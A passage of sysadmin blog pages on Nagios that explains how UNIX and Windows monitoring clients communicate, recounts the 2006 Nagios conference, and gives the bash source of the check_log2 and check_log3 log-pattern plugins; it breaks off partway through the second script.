In the menu you will find a configuration manual which I wrote for $CLIENT, as well as a bunch of plugins which were either modified or created for their environment. Quite possible there's one or two in there that will be interesting for you.


kilala.nl tags: , , ,

View or add comments (curr. 0)

How do Nagios clients communicate?

2006-06-01 00:00:00

I know that, the first time I started using Nagios, I got confused a little when it came to monitoring systems other than the one running Nagios. To shed a little light on the subject for the beginning Nagios user, here's a discussion of the various methods of talking to Nagios clients.

First off, let me make it absolutely clear that, in order to monitor systems other than the one running Nagios, you are indeed going to have to communicate with them in some fashion. Unfortunately very few things in the Sysadmin trade are magical, and Nagios is unfortunately not one of them.

So first off, let's look at the -wrong- way of doing things. When I first started with Nagios (actually I made this mistake on my second day with the software) I wrote something like this:

define service{

   host_name remote-host

   service_description D_ROOT

   check_command check_disk!85!95!/

}

The problem with this setup is that I was using a -local- check and said it belonged to remote-host. Now this may look alright on the status screen ("Hey! It's green!"), but naturally you're not monitoring the right thing ^_^

So how -do- you monitor remote resources? Here's a table comparing various methods. After that I'll give examples on how you can correct the mistake I made above with each method.

PLEASE NOTE: the following discussion will not cover the monitoring of systems other than the various UNIX flavours. Later on I'll write a similar article covering Windows and stuff like Cisco.


A quick comparison

SSH

NRPE

SNMP

SNMP traps

NSCA

Connection

initiation

Srv -> Clnt

Srv -> Clnt

Srv -> Clnt

Clnt -> Srv

Clnt -> Srv

Security

Encryption

TCP wrappers

Key pairs

Encryption

Access List

TCP wrappers

Access List (v2)

Password (v3)

Access List (v2)

Password (v3)

TCP wrappers

Encryption

Access List

TCP wrappers

Configuration

On server

On client

On client

On client and On server

On client

Difficulty

Easy

Moderate

Hard

Hard

Moderate


SSH

Just about everyone should already have SSH running on their servers (except for those few who are still running telnet or, horror or horrors!, rsh). So it's safe to assume that you can immediately start using this communications method to check your clients. You will need to:

You can now set up your services.cfg in such a way that each remote service is checked like so:

define service{

   host_name remote-host

   service_description D_ROOT

   check_command check_disk_by_ssh!85!95!/

}

Your check command definition would look something like this:

define command {

   command_name check_disk_by_ssh

   command_line /usr/local/nagios/libexec/check_by_ssh -H $HOSTADDRESS$ -C "/usr/local/nagios/libexec/check_disk -w $ARG1$ -c $ARG2$ $ARG3$"

}

Working this way will allow you to do most of your configuring centrally (on the Nagios server), thus saving you a lot of work on each client system. All you have to do over there is make sure that there's a working user account and that all the scripts are in place. Quite convenient... The only drawback being that you're making a relatively open account which has full access to the system (sometimes even with sudo access).



NRPE

As a replacement for the SSH access method, Ethan also wrote the NRPE daemon. Using NRPE requires that you:

You can now set up your services.cfg in such a way that each remote service is checked like so:

define service{

   host_name remote-host

   service_description D_ROOT

   check_command check_nrpe!check_root

}

And in /usr/local/nagios/etc/nrpe.cfg on the client you would need to include:

command[check_root]=/usr/local/nagios/libexec/check_disk 85 95 /

Good thing is that you won't have a semi-open account lying about. Bad things are that, if you want to change the configuration of your client, you're going to have to login. And you're going to have yet another piece of software to keep up to date.



SNMP

Whoo boy! This is something I'm working on right now at $CLIENT and let me tell you: it's hard! At least much harder than I was expecting.

SNMP is a network management protocol used by the more advanced system administrators. Using SNMP you can access just about -any- piece of equipment in your server room to read statistics, alarms and status messages. SNMP is universal, extensible, but it is also quite complicated. Not for the faint of heart.

To make proper use of monitoring through SNMP you'll need to:

The reason why point C tells you to register a private EID, is because the SNMP tree has a very rigid structure. Technically speaking you -could- just plonk down your results at a random place in the tree, but it's likely that this will screw up something else at a later time. IANA allows each company to have only one private EID, so first check if your company doesn't already have one on the IANA list.

Ufortunately the check_snmp script that comes with Nagios isn't flexible enough to let you monitor custom SNMP objects in a nice way. This is why I wrote the retrieve_custom_nagios script, which is available from the menu. Your service definition would look like this:

define service{

   host_name remote-host

   service_description D_ROOT

   check_command retrieve_custom_snmp!.1.3.6.1.4.1.6886.4.1.4

}

And in this case your snmpd.conf would contain a line like this:

exec .1.3.6.1.4.1.6886.4.1.4 check_d_root /usr/local/nagios/libexec/check_disk -w 85 -c 95 /

Up to now things are actually not that different from using NRPE, are they? Well, that's because we haven't even started using all the -real- features of SNMP. Point is that using SNMP you can dig very deeply into your system to retrieve all kinds of useful information. And -that's- where things get complicated because you're going to have to dig up all the object IDs (OIDs) that you're going to need. And in some cases you're going to have to install vendor specific sub-agents that know how to speak to your specific hardware.

One of the best features of SNMP though are the so-called traps. Using traps the SNMP daemon will actively undertake action when something goes wrong in your system. So if for instance your hard disk starts failing, it is possible to have the daemon send out an alert to your Nagios server! Awesome! But naturally this will require a boatload of additional configuration :(

So... SNMP is an awesomely powerful tool, but you're going to have to pay through the nose (in effort) to get it 100% perfect.



SNMP traps

SNMP doesn't involve polling alone. SNMP enabled devices can also be configured to automatically send status updates do a so-call trap host. The downside to receiving SNMP traps with Nagios is that it takes quite a lot of work to get them into Nagios :D

To make proper use of monitoring through SNMP you'll need to:

There are -many- ways to get the SNMP traps translated for Nagios' purposes, 'cause there's many roads that lead to Rome. Unfortunately none of them are very easy to use.



NSCA

And finally there's NSCA. This daemon is usually used by distributed Nagios servers to send their results to the central Nagios server, which gathers them as so-called "passive checks". It is however entirely possible to install NSCA on each of your Nagios clients, which will then get called to send in the results of local checks. In this case you'll need to:

On your Nagios server things would look like this:

define service{

   host_name remote-host

   service_description D_ROOT

   check_command check_disk!85!95!/

   passive_checks_enable 1

   active_checks_enable 0

}

For the configuration on the client side I recommend that you read up on NSCA. It's a little bit too much to show over here.

The upside to this is that you won't have to run any daemon on your client to accept incoming connections. This will allow you to lock down your system in a hard way.


Naturally you are absolutely free to combine two or more of the methods described above. You could poll through NRPE and receive SNMP traps in one environment. This will have both ups and downs, but it's up to your own discretion. Use the tools that feel natural to you, or use those that are already standard in your environment.

I realise I've rushed through things a little bit, but I was in a slight hurry :) I will go over this article a second time RSN, to apply some polish.


kilala.nl tags: , , , ,

View or add comments (curr. 1)

How do Nagios clients on Windows communicate?

2006-06-01 00:00:00

After reading through my small write-up on Nagios clients on UNIX you may also be interested in the same story for Windows systems.

Since Nagios was originally written with UNIX systems in mind, it'll be a little bit trickier to get the same amount of information from a Windows box. Luckily there are a few tools available that will help you along the way.

For a quick introduction the Nagios clients, read the write-up linked above. Or pick it from the menu on the left.


A quick comparison

NSClient

NRPEnt

NSClient++

SNMP

SNMP traps

NC_net **

Connection

initiation

Srv -> Clnt

Srv -> Clnt

Srv -> Clnt

Srv -> Clnt

Clnt -> Srv

Clnt -> Srv
Srv -> Clnt

Security

Password

Password

Encryption

Password

Encryption *

ACL

Access List

Password

Access List

Password

Encryption

ACL

Configuration

On client

On client

On client

On client

On client and

On server

On client

Difficulty

Moderate

Moderate

Moderate

Hard

Hard

Moderate

Resource

usage ***

unknown

unknown

9MB RAM

unknown

unknown

30MB RAM

Available

Here

Here

Here

Here

Here

Here

*: Thanks to Jeronimo Zucco for pointing out that encryption in NSClient++ only works when used with the NRPE DLL.

**: Thanks to Anthony Montibello for pointing out recent changes to NC_Net, which is now at version 3.

***: Thanks to Kyle Hasegawa for providing me with resource usage infor on the various clients.


NSClient

NSClient was originally written to work with Nagios when it was still called NetSaint: a long, long time ago. NSClient only provides you with access to a very small number of system metrics, including those that are usually available through the Windows Performance Tool.

Personally I have no love for this tool since it is quite fidgetty to use. In order to use NSClient on your systems, you will need to do the following.

You can now set up your services.cfg in such a way that each remote service is checked like so:

define service{

   host_name remote-host

   service_description D_ROOT

   check_command check_nt_disk!C!85!95

}

Your check command definition would look something like this:

define command {

   command_name check_nt_disk

   command_line /usr/local/nagios/libexec/check_nt -H $HOSTADDRESS$ -p 1248 -v USEDDISKSPACE -l $ARG1$ -w $ARG2$ -c $ARG3

}



NRPEnt

NRPEnt is basically a drop-in replacement for NRPE on Windows. It really does work the same way: on the Nagios server you run check_nrpe and on the Windows side you have plugins to run locally. These plugins can be binaries, Perl scripts, VBScript, .BAT files, whatever.

To set things up, you'll need the same things as with the normal NRPE.

You can now set up your services.cfg in such a way that each remote service is checked like so:

define service{

   host_name remote-host

   service_description D_ROOT

   check_command check_nrpe!check_root

}

And in nrpent.cfg on the client you would need to include:

command[check_root]=C:\windows\system32\cscript.exe //NoLogo //T:10 c:\nrpe_nt\check_disk.wsf /drive:"c:/" /w:300 /c:100



NSClient++

Due to the limited use provided by NSClient, someone decided to create NSClient++. This piece of software is a lot more useful because it actually combines the functionality of the original NSClient and that of NRPEnt into one Windows daemon.

NSClient++ includes the same security measures as NRPEnt and NSClient, but adds an ACL functionality on top of that.

On the configuration side things are basically the same as with NSClient and NRPEnt. You can use both methods to talk to a client running NSClient++.



SNMP

Unfortunately I haven't yet worked with SNMP on Windows systems, so I can't tell you much about this. I'm sure though that things won't be much different from the UNIX side. So please check the Nagios UNIX clients story for the full details.

To make proper use of monitoring through SNMP you'll need to:

Ufortunately the check_snmp script that comes with Nagios isn't flexible enough to let you monitor custom SNMP objects in a nice way. This is why I wrote the retrieve_custom_nagios script, which is available from the menu. Your service definition would look like this:

define service{

   host_name remote-host

   service_description D_ROOT

   check_command retrieve_custom_snmp!.1.3.6.1.4.1.6886.4.1.4

}

As I said, I haven't configured a Windows SNMP daemon before, so I really can't tell you what the config would look like. Just look for options similar to "EXEC", which allows you to run a certain command on demand.

Just as is the case with UNIX systems you will need to dig around the MIB files provided to you by Microsoft and you hardware vendors to find the OIDs for interesting metrics. It's not an easy job, but with some luck you'll find a website where someone's already done the hard work for you :)



SNMP traps

SNMP doesn't involve polling alone. SNMP enabled devices can also be configured to automatically send status updates do a so-call trap host. The downside to receiving SNMP traps with Nagios is that it takes quite a lot of work to get them into Nagios :D

To make proper use of monitoring through SNMP traps you'll need to:

There are -many- ways to get the SNMP traps translated for Nagios' purposes, 'cause there's many roads that lead to Rome. Unfortunately none of them are very easy to use.



NC_net

NC_net is another replacement for the original NSClient daemon. It performs the same basic checks, plus a few additional ones, but it is not exentable with your own scripts (like NRPEnt is).

So why run NC_net instead of NSClient++? Because it is capable of sending passive check results to your Nagios server using a send_nsca-alike method. So if you're going all the way in passifying all your service checks, then NC_net is the way to go.

I haven't worked with NC_net yet, so I can't tell you anything about how it works. Too bad :(

UPDATE 31/10/2006:
I was informed by Marlo Bell of the Nagios mailing list that NC_net version 3.x does indeed allow running your own scripts and calling them through the NRPEnt interface! That's great to know, as it does in fact make NC_net the most versatile solution for running Nagios on your Windows.

Also, Anthony Montibello (lead NC_Net dev) tells me that NC_Net 3 requires dotNET 2.0.


kilala.nl tags: , , , ,

View or add comments (curr. 7)

Nagions Conference 2006, Nurnberg

2006-06-01 00:00:00

September 21-22 of 2006 saw the first annual Nagios Conference. Organised by the good folk of Netways, the conference was attended by around 130 people (mostly Germans, with some foreigners thrown in for fun).

Originally I posted some comments about the conference on my blog, but I thought I'd move them over into the Sysadmin section, to keep Google from thinking the Archives had content about Nagios :D

Day 0

Wow... Today was a long day :)

Left Utrecht around 09:30 and finally arrived at the hotel at 17:30. Eight hours, just as I predicted! 6 hours driving (0.5 of which due to delays) and 2 hours spent resting. Speaking of: I -love- the Germanian Autobahn! They are littered with comfortable places to take a break and there's also an abundance of what they call a Rasthof: parking space, combined with restaurants, gas station, maybe a hotel, a few shops and very cool sanitary facilities (by the Sanifair company). I'll talk about those some more another time :)

What else is there to tell? I showered, I unpacked, we had dinner with the whole group and I met some interesting people. *waves* Hi Stephan! Hi Jorg! *waves*

Now... I feel really tired (I also notice that it's getting harder for me to string together coherent thought, despite the recent cappuccino), so I'd better get to bed... I'm actually quite woozy in the head! :)

Tomorrow the conference'll start, so I'd better be at my best!

Day 1

So far, it's been an interesting day.

In the morning, Ethan Galstad (main Nagios developer) covered his plans for the future. Version 3.x (improved notification, expanded plugin output, custom variables and a greatly improved method for host checking) will Alpha in October and Stable somewhere this winter, while 4.x (a new PHP-based GUI, among other things) is on the long-term roadmap.

After that Michael Kienle and Markus Kosters told us a few things about the practical side of implementing Nagios in your organisation. I was already familiar with most of what they told us, but it must've been an eye opener for a lot of people! The notion that Nagios needs much more than just "download and install" is apparently foreign to a lot of people, which comes back to bite them in the ass later.

Lunch was terrific. I don't know how they do it, but the Nurnberg Holiday Inn are perfectly capable of making a buffet-style meal that -is- quite edible and actually varied and tasty! Kudos to them!

While on the subject of the hotel... The hotel, the rooms, the facilities: they're all wonderful. Nice ambience, a swanky in-house cafe and comfortable furniture. I like it! I just have to wonder about one thing: why the heck are there at least a dozen brothels and sex clubs surrounding the hotel?! o_O

The afternoon saw two sessions regarding data collection and representation: RRDTool and NagiosGrapher. RRD itself couldn't interest me for long, but NagGraph (which relies on RRD) on the other hand could. NagGraph allows you to include somewhat complicated graphs to Nagios (inside the Nagios GUI), which gives you something that is a little similar to Cacti

I had to skip the session on monitoring storage systems, because I -really- needed some fresh air. So I walked around Nurnberg's Alt Stad for a while. Looks nice, I have to say :) Of course I was only able to see a small part of it, but hey... At least I got out for a while. [EDIT: Anand from ASAM told me afterwards that I didn't miss much. Apparently is was kind of a marketing spiel]

So... The plan for the rest of the day:

See you guys tomorrow!

Day 2

*phew* That was great! <3

I'm sitting here in my hotel room with some apple soda and some Pringles, feeling nice and drowsy thanks to the hotel's sauna. It felt real good, just spending an hour and a half relaxing.

Anywho... The conference today... Pretty darn interesting and it gave me a load of things to think about! In his morning session Ethan covered some things that you usually don't think of when configuring Nagios, but that can save you loads of trouble! A few of the things he mentioned I will actually try to work into the design of $CLIENT's new Nagios infra, 'cause else they may run into some problems later.

The rest of the morning for me was filled with two sessions on varying ways to get info into Nagios. On the one hand there was SNMPtt (trap translator), which to me seemed like a really backward solution to a problem that wasn't too difficult to start with. And on the other hand, there was EventDB whose goal it is to have only one check command to access information provided by a great variety of sources. The only down-side being that you'll need translation adapters for each of these sources (which means that you basically are filling one whole by digging another).

Now I don't mean to be too negative about these two sessions. I'm sure that a lot of people are actually very happy to see these tools and that they will have some great uses for them.

Lunch... What can I say? It was great, just like yesterday. The hotel took great care of us, thanks to Netways.

After lunch, Ton Voon kicked off with a brief session on open source etiquette. Basically telling the attendees both the up and down sides their companies could experience by contributing to the Nagios community. As ever, Ton was charismatic and displayed a good sense of humor ^_^

Two Netways employees gave talks on:
1. The IT Portal they implemented at the Bundesverwaltungsamt. This is actually the same portal that Markus Kosters told us about yesterday, but Julian actually took time to show us the technology behind the portal.
2. Integrating Nagios with Asterisk (among other things), to allow for some nice telephone trickery. Mind you, Asterisk isn't really my thing, but I can imagine some people enjoying the idea of being called by the Nagios server to literally -tell- them (through a .WAV voice) that their server's down.

For me, the con was closed by a guy giving a marketing spiel about the services his company provides, but I was actually able to glean something useful from the talk.

Unfortunately there was no official closing ceremony, so the con ended quite abruptly. Which means that just about everyone stormed out of the building in the span of thirty minutes. I did however get to say goodbye to a few nice acquaintances I've made during these three days. And my hat's off to Anand who decided to drive home during the night (he lives in The Hague)... He should be arriving home, somewhere around 0200 ;_; Wow!

While waving off the last person to leave (Stephan), I met up with Ethan and his SO, Mary. We went to dinner together and I must say I enjoyed their company! Friendly folks and very down to earth. I believe that sometimes Ethan is just overwhelmed by all the attention people are willing to give him... Who could blame him?

Aside from Ethan and Mary, I'm the last conference attendee at the hotel. In the morning, I'll have a nice breakfast, grab some rolls at the bakery and head off home. I reckon I should get there around five-ish.


kilala.nl tags: , ,

View or add comments (curr. 0)

Nagios script: check_log2

2006-06-01 00:00:00

This script was written at the time I was hired by UPC / Liberty Global.

Improved log checker for Solaris, with state retention.

I found that the version of check_log included in the default monitor package doesn't work perfectly on Solaris: it needs a bit of tweaking... Which is what I've done for the script.

Also, I've added state retention. It's a bit of a hack, but hey! I needed a quick solution.

The original script sends a Critical when it detects the string you've queried the log file for, but it clears that same Critical immediately if the same message is not repeated once the monitor runs again. Meaning that, if there are no updates to your log file, the Critical will only be around until the next time the monitor runs.

Not very handy if the Critical occurs during the night.

This new version of the script creates a file called $oldlog.STATE in /usr/local/nagios/var (which should be 755, nagios:nagios), which contains the exit status for the last detected _changed_ status... If there are no changes detected in your log file, this old exit state is repeated.

The script has been tested on Solaris 8, Mac OS X 10.4 and Redhat ES3.

UPDATE 19/06/2006:

Cleaned up the script a bit and added some checks that are considered the Right Thing to do. Should have done this -way- earlier!

Also stomped out a few horrendous bugs! I'm very sorry for putting out such a buggy script earlier... If you've started using the script in your environment, please download the latest version. Thanks to Ali Khan for pointing out these mistakes.


#!/bin/bash
#
# Log file pattern detector plugin for Nagios
# Written by Ethan Galstad (nagios@nagios.org)
# Last Modified: 07-31-1999
# Updated by Thomas Sluyter (nagiosATkilalaDOTnl)
# Last Modified: 19-06-2006
#
# Usage: ./check_log2 -F log_file -O old_log_file -Q pattern
#
# Description:
#
# This plugin will scan a log file (specified by the log_file option)
# for a specific pattern (specified by the pattern option).  Successive
# calls to the plugin script will only report *new* pattern matches in the
# log file, since an copy of the log file from the previous run is saved
# to old_log_file.
#
# Output:
#
# On the first run of the plugin, it will return an OK state with a message
# of "Log check data initialized".  On successive runs, it will return an OK
# state if *no* pattern matches have been found in the *difference* between the
# log file and the older copy of the log file.  If the plugin detects any 
# pattern matches in the log diff, it will return a CRITICAL state and print
# out a message is the following format: "(x) last_match", where "x" is the
# total number of pattern matches found in the file and "last_match" is the
# last entry in the log file which matches the pattern.
#
# Notes:
#
# If you use this plugin make sure to keep the following in mind:
#
#    1.  The "max_attempts" value for the service should be 1, as this
#        will prevent Nagios from retrying the service check (the
#        next time the check is run it will not produce the same results).
#
#    2.  The "notify_recovery" value for the service should be 0, so that
#        Nagios does not notify you of "recoveries" for the check.  Since
#        pattern matches in the log file will only be reported once and not
#        the next time, there will always be "recoveries" for the service, even
#        though recoveries really don't apply to this type of check.
#
#    3.  You *must* supply a different old_file_log for each service that
#        you define to use this plugin script - even if the different services
#        check the same log_file for pattern matches.  This is necessary
#        because of the way the script operates.
#
#    4.  Changes to the script were made by Thomas Sluyter (nagios@kilala.nl).
#	 The first set of changes will allow the script to run properly on Solaris, which
#	 it did not do by default. The second set of changes will allow the following:
#	 * State retention. If a NOK was generated at point A in time and it is not repeated
# 	   at A+1, then an OK is sent to Nagios. Not something that you would like to happen.
#	   I've added the $oldlog.STATE trigger file which retains the last exitstatus. Should
# 	   there be no new lines added to the log, check_log will simply repeat the last state
#	   instead of give an OK.
#
# Examples:
#
# Check for login failures in the syslog...
#
#   check_log -F /var/log/messages -O /usr/local/nagios/var/check_log.badlogins.old -Q "LOGIN FAILURE"
#
# Check for port scan alerts generated by Psionic's PortSentry software...
#
#   check_log -F /var/log/messages -O /usr/local/nagios/var/check_log.portscan.old -Q "attackalert"
#

# Paths to commands used in this script.  These
# may have to be modified to match your system setup.

PATH="/usr/bin:/usr/sbin:/bin:/sbin"

PROGNAME=`basename $0`
PROGPATH=`echo $0 | sed -e 's,[\\/][^\\/][^\\/]*$,,'`

#. $PROGPATH/utils.sh
. /usr/local/nagios/libexec/utils.sh

print_usage() {
    echo "Usage: $PROGNAME -F logfile -O oldlog -Q query"
    echo "Usage: $PROGNAME --help"
}

print_help() {
    echo ""
    print_usage
    echo ""
    echo "Log file pattern detector plugin for Nagios"
    echo ""
    support
}

# Make sure the correct number of command line
# arguments have been supplied

if [ $# -lt 6 ]; then
    print_usage
    exit $STATE_UNKNOWN
fi

# Grab the command line arguments

exitstatus=$STATE_WARNING #default
while test -n "$1"; do
    case "$1" in
        --help)
            print_help
            exit $STATE_OK
            ;;
        -h)
            print_help
            exit $STATE_OK
            ;;
        -F)
            logfile=$2
            shift
            ;;
        -O)
            oldlog=$2
            shift
            ;;
        -Q)
            query=$2
            shift
            ;;
        *)
            echo "Unknown argument: $1"
            print_usage
            exit $STATE_UNKNOWN
            ;;
    esac
    shift
done

# If the source log file doesn't exist, exit

if [ ! -e $logfile ]; then
    echo "Log check error: Log file $logfile does not exist!"
    exit $STATE_UNKNOWN
    echo $STATE_UNKNOWN > $oldlog.STATE
fi

# If the oldlog file doesn't exist, this must be the first time
# we're running this test, so copy the original log file over to
# the old diff file and exit

if [ ! -e $oldlog ]; then
    cat $logfile > $oldlog
    if [ `tail -1 $logfile | grep -i $query | wc -l` -gt 0 ]
    then
        echo "Log check data initialized... Last line contained error message."
        echo $STATE_CRITICAL > $oldlog.STATE
	exit $STATE_CRITICAL
    else
        echo "Log check data initialized..."
        echo $STATE_OK > $oldlog.STATE
        exit $STATE_OK
    fi
fi

# A bug which was caught very late:
# If newlog is shorter than oldlog, the diff used below will return
# false positives for the query because the will be in $oldlog. Why?
# Because $oldlog is not rolled over / rotated, like $newlog. I need 
# to fix this in a kludgy way.

if [ `wc -l $logfile|awk '{print $1}'` -lt `wc -l $oldlog|awk '{print $1}'` ]
then
    rm $oldlog
    cat $logfile > $oldlog
    if [ `tail -1 $logfile | grep -i $query | wc -l` -gt 0 ]
    then
        echo "Log check data re-initialized... Last line contained error message."
        echo $STATE_CRITICAL > $oldlog.STATE
	exit $STATE_CRITICAL
    else
        echo "Log check data re-initialized..."
        echo $STATE_OK > $oldlog.STATE
        exit $STATE_OK
    fi
fi

# Everything seems fine, so compare it to the original log now

# The temporary file that the script should use while
# processing the log file.
if [ -x mktemp ]; then
    tempdiff=`mktemp /tmp/check_log.XXXXXXXXXX`
else
    tempdate=`/bin/date '+%H%M%S'`
    tempdiff="/tmp/check_log.${tempdate}"
    touch $tempdiff
fi

diff $logfile $oldlog > $tempdiff

if [ `wc -l $tempdiff|awk '{print $1}'` -eq 0 ]
then
     rm $tempdiff
     touch $oldlog.STATE
     exitstatus=`cat $oldlog.STATE`
     echo "LOG FILE - No status change detected. Status = $exitstatus"
     exit $exitstatus
fi

# Count the number of matching log entries we have
count=`grep -c "$query" $tempdiff`

# Get the last matching entry in the diff file
lastentry=`grep "$query" $tempdiff | tail -1`

rm -f $tempdiff
cat $logfile > $oldlog

if [ "$count" = "0" ]; then # no matches, exit with no error
    echo "Log check ok - 0 pattern matches found"
    exitstatus=$STATE_OK
else # Print total matche count and the last entry we found
#    echo "($count) $lastentry"
    echo "Log check NOK - $lastentry"
    exitstatus=$STATE_CRITICAL
    echo $STATE_CRITICAL > $oldlog.STATE
fi

exit $exitstatus


echo "Starting clean"
rm /tmp/foobar /usr/local/nagios/var/foobar*
/usr/local/nagios/libexec/check_log2 -F /tmp/foobar -O /usr/local/nagios/var/foobar.archive -Q neko
echo $?
echo ""

echo "Starting normally"
echo "normal"
echo "normal" >> /tmp/foobar
/usr/local/nagios/libexec/check_log2 -F /tmp/foobar -O /usr/local/nagios/var/foobar.archive -Q neko
echo $?
echo ""
echo "normal"
echo "normal" >> /tmp/foobar
/usr/local/nagios/libexec/check_log2 -F /tmp/foobar -O /usr/local/nagios/var/foobar.archive -Q neko
echo $?
echo ""
echo "critical"
echo "neko" >> /tmp/foobar
/usr/local/nagios/libexec/check_log2 -F /tmp/foobar -O /usr/local/nagios/var/foobar.archive -Q neko
echo $?
echo ""
echo "normal"
echo "baka" >> /tmp/foobar
/usr/local/nagios/libexec/check_log2 -F /tmp/foobar -O /usr/local/nagios/var/foobar.archive -Q neko
echo $?
echo ""

echo "Log rotation with crit"
rm /tmp/foobar
/usr/local/nagios/libexec/check_log2 -F /tmp/foobar -O /usr/local/nagios/var/foobar.archive -Q neko
echo $?
echo ""
echo "critical"
echo "neko" >> /tmp/foobar
/usr/local/nagios/libexec/check_log2 -F /tmp/foobar -O /usr/local/nagios/var/foobar.archive -Q neko
echo $?
echo ""
echo "normal"
echo "baka" >> /tmp/foobar
/usr/local/nagios/libexec/check_log2 -F /tmp/foobar -O /usr/local/nagios/var/foobar.archive -Q neko
echo $?
echo ""

echo "Normal log rotation"
rm /tmp/foobar
/usr/local/nagios/libexec/check_log2 -F /tmp/foobar -O /usr/local/nagios/var/foobar.archive -Q neko
echo $?
echo ""
echo "normal"
echo "baka" >> /tmp/foobar
/usr/local/nagios/libexec/check_log2 -F /tmp/foobar -O /usr/local/nagios/var/foobar.archive -Q neko
echo $?
echo ""
echo "normal"
echo "baka" >> /tmp/foobar
/usr/local/nagios/libexec/check_log2 -F /tmp/foobar -O /usr/local/nagios/var/foobar.archive -Q neko
echo $?
echo ""


kilala.nl tags: , , ,

View or add comments (curr. 2)

Nagios script: check_log3

2006-06-01 00:00:00

This script was written at the time I was hired by KPN i-Diensten. It is reproduced/shared here with their permission.

Today I made an improved version of the Nagios monitor "check_log2", which is now aptly called "check_log3". It includes all the improvements I originally added to "check_log2", so you can simply use this as a drop-in replacement.

Version 3 of this script gives you the option to add a second query to the monitor.

The previous two incarnations of the script only allowed you to search for one query and would return a Critical if it was found. Now you can also add a query which will return in a Warning message as well. Goody! :3

1st of Feb, 2006:

Kyle Tucker pointed out that he had problems running this script with bash on Solaris. The changes he suggested have been worked into the newer version. Thanks Kyle :)

5th of Mar, 2006:

I finally got round to fix the script according to all the changes Kyle (and others) suggested. So here's another try! Right now I've tested the script on Red Hat, Mac OS X and Solaris, so it should be much better than before.

19th of June, 2006:

Cleaned up the script a bit and added some checks that are considered the Right Thing to do. Should have done this -way- earlier!

Also stomped out a few horrendous bugs! I'm very sorry for putting out such a buggy script earlier... If you've started using the script in your environment, please download the latest version. Thanks to Ali Khan for pointing out these mistakes.



#!/bin/bash
#
# Log file pattern detector plugin for Nagios
# Written by Ethan Galstad (nagios@nagios.org)
# Last Modified: 07-31-1999
# Heavily modified by Thomas Sluyter (nagiosATkilalaDOTnl)
# Last Modified: 19-06-2006
#
# Usage: ./check_log3 -F log_file -O old_log_file -C crit-pattern -W warn-pattern
#
# Description:
#
# This plugin will scan a log file (specified by the log_file option)
# for specific patterns (specified by the XXX-pattern options).  Successive
# calls to the plugin script will only report *new* pattern matches in the
# log file, since an copy of the log file from the previous run is saved
# to old_log_file.
#
# Output:
#
# On the first run of the plugin, it will return an OK state with a message
# of "Log check data initialized".  On successive runs, it will return an OK
# state if *no* pattern matches have been found in the *difference* between the
# log file and the older copy of the log file.  If the plugin detects any 
# pattern matches in the log diff, it will return a CRITICAL state and print
# out a message is the following format: "(x) last_match", where "x" is the
# total number of pattern matches found in the file and "last_match" is the
# last entry in the log file which matches the pattern.
#
# Notes:
#
# If you use this plugin make sure to keep the following in mind:
#
#    1.  The "max_attempts" value for the service should be 1, as this
#        will prevent Nagios from retrying the service check (the
#        next time the check is run it will not produce the same results).
#
#    2.  The "notify_recovery" value for the service should be 0, so that
#        Nagios does not notify you of "recoveries" for the check.  Since
#        pattern matches in the log file will only be reported once and not
#        the next time, there will always be "recoveries" for the service, even
#        though recoveries really don't apply to this type of check.
#
#    3.  You *must* supply a different old_file_log for each service that
#        you define to use this plugin script - even if the different services
#        check the same log_file for pattern matches.  This is necessary
#        because of the way the script operates.
#
#    4.  Changes to the script were made by Thomas Sluyter (cailin@kilala.nl).
#	 * The first set of changes will allow the script to run properly on Solaris, which
#	   it did not do by default. The second set of changes will allow the following:
#	 * State retention. In the original script, if a NOK was put into the log file
#	   at point A in time and it is not repeated at A+1, then an OK is sent to Nagios. 
# 	   Not something that you would like to happen.
#	      I've added the $oldlog.STATE trigger file which retains the last exitstatus. Should
# 	   there be no new lines added to the log, check_log will simply repeat the last state
#	   instead of give an OK.
#	      In order for this state retention to work properly your client system MUST
#	   HAVE THE DIRECTORY /USR/LOCAL/NAGIOS/VAR.
#        * Two queries. In the original script you could only enter one query which, when
#	   found, would result in  a Critical message being sent to Nagios. I've added the 
#	   possibility to add another query, which will result in a Warning message.
#	 * Bugfix: changed all instances of "crit-count" and "warn-count" to "critcount" and
#	   "warncount" after a tip from Kyle Tucker who ran into problems running this script
#	   with bash on Solaris.
#

# Paths to commands used in this script.  These
# may have to be modified to match your system setup.

PATH="/usr/bin:/usr/sbin:/bin:/sbin"

PROGNAME=`basename $0`
PROGPATH=`echo $0 | sed -e 's,[\\/][^\\/][^\\/]*$,,'`

#. $PROGPATH/utils.sh
. /usr/local/nagios/libexec/utils.sh

print_usage() {
    echo "Usage: $PROGNAME -F logfile -O oldlog -C CRITquery -W WARNquery"
    echo "Usage: $PROGNAME --help"
    echo "Usage: $PROGNAME --version"
}

print_help() {
    echo ""
    print_usage
    echo ""
    echo "Log file pattern detector plugin for Nagios"
    echo ""
    support
}

# Make sure the correct number of command line
# arguments have been supplied

if [ $# -lt 8 ]; then
    print_usage
    exit $STATE_UNKNOWN
fi

# Grab the command line arguments

exitstatus=$STATE_WARNING #default
while test -n "$1"; do
    case "$1" in
        --help)
            print_help
            exit $STATE_OK
            ;;
        -h)
            print_help
            exit $STATE_OK
            ;;
        -F)
            logfile=$2
            shift
            ;;
        -O)
            oldlog=$2
            shift
            ;;
        -C)
            CRITquery=$2
            shift
            ;;
        -W)
            WARNquery=$2
            shift
            ;;
        *)
            echo "Unknown argument: $1"
            print_usage
            exit $STATE_UNKNOWN
            ;;
    esac
    shift
done

# If the source log file doesn't exist, exit

if [ ! -e $logfile ]; then
    echo "Log check error: Log file $logfile does not exist!"
    exit $STATE_UNKNOWN
    echo $STATE_UNKNOWN > $oldlog.STATE
fi

# If the dump/temp log file doesn't exist, this must be the first time
# we're running this test, so copy the original log file over to
# the old diff file and exit

if [ ! -e $oldlog ]; then
    cat $logfile > $oldlog

    TEMPcount=0
    let TEMPcount=$TEMPcount+$(tail -1 $logfile | grep -i $WARNquery | wc -l | awk '{print $1}')
    let TEMPcount=$TEMPcount+$(tail -1 $logfile | grep -i $CRITquery | wc -l | awk '{print $1}')

    if [ $TEMPcount -gt 0 ]
    then
       echo "Log check data initialized... Last line contained error message."
       echo $STATE_WARNING > $oldlog.STATE
       exit $STATE_WARNING
    else
       echo "Log check data initialized..."
       echo $STATE_OK > $oldlog.STATE
       exit $STATE_OK
    fi
fi

# A bug which was caught very late:
# If newlog is shorter than oldlog, the diff used below will return
# false positives for the query because the will be in $oldlog. Why?
# Because $oldlog is not rolled over / rotated, like $newlog. I need
# to fix this in a kludgy way.

if [ `wc -l $logfile|awk '{print $1}'` -lt `wc -l $oldlog|awk '{print $1}'` ]
